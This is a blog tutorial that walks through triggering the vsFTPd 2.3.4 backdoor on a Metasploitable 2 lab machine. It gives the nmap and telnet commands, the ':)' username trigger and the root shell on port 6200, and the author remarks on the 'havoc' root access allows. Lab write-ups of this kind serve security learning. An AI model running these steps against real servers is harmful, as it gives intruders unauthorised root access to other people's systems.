I assume from the previous article that you did some
research on the vulnerable FTP service (vsFTPd 2.3.4).
A quick intro to what is an exploit:
An exploit is a piece of code that takes advantage of a
security gap in an application code. In the case of vsFTPd 2.3.4, an intruder
modified the source code of the original vsFTPd 2.3.4 code to open a backdoored
version if the username entered ended with “:)” characters. The backdoored
version will open a listening connection on port 6200.
Lets check it out for ourselves.
Fire up your Kali and Metaploitable 2.
We will skip the host
discovery part as we have covered it almost twice and want to avoid repetition.
You can find it here.
Check the status of port 6200
Enter the command: nmap -p 6200 <<target IP
address>>
This command with the “-p” flag tells nmap to scan port 6200
on the given target IP address.
The results show that the port is closed and there is no
service running on it.
Activating the backdoored vsFTPd 2.3.4
Enter the command: telnet <<target IP address>>
21
Note that “21” in the above command references to the port
number the FTP service is running on. After the command is executed, you are prompt to enter a
username and password to access the system.
You can type anything as the username as long as it has the
2 characters “:)” at the end, and you will activate the backdoor.
Check the current status of port 6200
Let’s now check the current status of the port 6200 with command: nmap -p 6200 <<target IP
address>>
Voila! The port is now open.
Telnet into port 6200
Enter command: telnet <<target IP address>> 6200
After command execution, type in “id” to see what user you
are running as.
With root access you can do lots of havoc.
I will leave it up to you to research on telnet commands and
how to use those commands.
-Jayesh Kerai (@secjay)
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.